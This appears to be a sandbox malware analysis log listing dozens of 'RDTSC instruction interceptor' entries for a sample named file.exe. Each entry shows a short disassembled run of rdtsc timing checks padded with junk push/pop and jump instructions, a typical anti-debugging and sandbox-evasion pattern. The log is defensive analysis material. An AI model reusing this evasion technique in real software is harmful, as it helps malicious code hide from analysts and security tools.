                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B16B second address: 101B1BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5AD8CCF447h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F5AD8CCF44Bh 0x00000015 jmp 00007F5AD8CCF445h 0x0000001a pushad 0x0000001b jg 00007F5AD8CCF436h 0x00000021 push edx 0x00000022 pop edx 0x00000023 jp 00007F5AD8CCF436h 0x00000029 js 00007F5AD8CCF436h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B1BD second address: 101B1C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10209E8 second address: 10209FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F5AD8CCF436h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d je 00007F5AD8CCF436h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6FF88 second address: F6FF93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F5AD8CCD666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102397B second address: 10239A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F5AD8CCF436h 0x0000000c popad 0x0000000d jmp 00007F5AD8CCF448h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10239A0 second address: 10239A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10239A6 second address: 10239AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023D8F second address: 1023D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F5AD8CCD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023D9E second address: 1023DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102407A second address: 10240B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F5AD8CCD675h 0x0000000b jmp 00007F5AD8CCD679h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10240B0 second address: 10240B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10244FA second address: 102450B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD66Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BE09 second address: 102BE2A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jnp 00007F5AD8CCF436h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5AD8CCF43Dh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C6D7 second address: 102C6EC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F5AD8CCD666h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C81E second address: 102C83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF43Bh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jmp 00007F5AD8CCF43Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C83A second address: 102C849 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007F5AD8CCD666h 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C9BC second address: 102C9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C9C7 second address: 102C9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CCDC second address: 102CCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DA81 second address: 102DA87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DA87 second address: 102DA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5AD8CCF43Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B97B second address: 102B97F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B97F second address: 102B99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5AD8CCF442h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B99D second address: 102B9C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F5AD8CCD666h 0x00000009 jmp 00007F5AD8CCD677h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B9C2 second address: 102B9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103657C second address: 1036582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036582 second address: 103659F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F5AD8CCF436h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F5AD8CCF43Ch 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103659F second address: 10365A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041974 second address: 104197E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AD8CCF436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104197E second address: 1041984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104564D second address: 1045675 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5AD8CCF436h 0x00000008 jmp 00007F5AD8CCF443h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F5AD8CCF436h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045675 second address: 10456B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F5AD8CCD67Ch 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F5AD8CCD674h 0x00000013 jmp 00007F5AD8CCD678h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045384 second address: 10453A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5AD8CCF442h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jg 00007F5AD8CCF436h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055E65 second address: 1055E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055E69 second address: 1055E79 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055E79 second address: 1055E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058C76 second address: 1058CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF446h 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5AD8CCF442h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A2C7 second address: 105A2EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F5AD8CCD67Dh 0x0000000e jmp 00007F5AD8CCD677h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F312 second address: 105F316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F316 second address: 105F322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5AD8CCD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F322 second address: 105F340 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5AD8CCF43Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F5AD8CCF436h 0x00000010 ja 00007F5AD8CCF436h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F340 second address: 105F346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F346 second address: 105F361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5AD8CCF43Dh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F361 second address: 105F365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F365 second address: 105F36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F36B second address: 105F387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5AD8CCD676h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F387 second address: 105F3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F5AD8CCF436h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F3A8 second address: 105F3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F52E second address: 105F544 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5AD8CCF43Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F544 second address: 105F55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F5AD8CCD66Fh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FACF second address: 105FADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF43Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FDC8 second address: 105FDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106075F second address: 1060776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F5AD8CCF43Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063E9A second address: 1063EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064002 second address: 1064008 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064008 second address: 1064014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107087E second address: 107088E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10706CE second address: 10706F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD66Ch 0x00000007 je 00007F5AD8CCD666h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jmp 00007F5AD8CCD66Fh 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10706F8 second address: 1070702 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5AD8CCF43Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070702 second address: 1070719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD66Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D573 second address: 107D577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D577 second address: 107D590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD66Ah 0x0000000c jng 00007F5AD8CCD666h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10801C5 second address: 10801CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10801CA second address: 10801E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jmp 00007F5AD8CCD66Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108004F second address: 1080064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push ebx 0x0000000b jnp 00007F5AD8CCF43Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FDCE second address: 108FDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FDD2 second address: 108FDD8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FDD8 second address: 108FDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FDDE second address: 108FDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EAF1 second address: 108EAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EAF5 second address: 108EAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC6E second address: 108EC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC72 second address: 108EC9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5AD8CCF441h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5AD8CCF440h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC9E second address: 108ECA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE1F second address: 108EE3A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5AD8CCF436h 0x00000008 ja 00007F5AD8CCF436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F5AD8CCF438h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE3A second address: 108EE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE49 second address: 108EE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F5AD8CCF436h 0x0000000c popad 0x0000000d jne 00007F5AD8CCF438h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE5E second address: 108EE7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F5AD8CCD678h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE7D second address: 108EE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F5AD8CCF436h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F144 second address: 108F159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5AD8CCD66Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F159 second address: 108F15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F15F second address: 108F165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F165 second address: 108F169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F8ED second address: 108F928 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5AD8CCD678h 0x00000008 jmp 00007F5AD8CCD670h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jno 00007F5AD8CCD66Ah 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jnp 00007F5AD8CCD694h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5AD8CCD66Dh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F928 second address: 108F941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF445h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FADA second address: 108FAED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F5AD8CCD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093BEF second address: 1093C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AD8CCF449h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093C0C second address: 1093C29 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5AD8CCD66Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093C29 second address: 1093C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093CCD second address: 1093CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093CD3 second address: 1093D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5AD8CCF442h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093D00 second address: 1093D05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109411C second address: 1094120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529024F second address: 529026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529026B second address: 529026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529026F second address: 5290282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD66Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290374 second address: 529037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
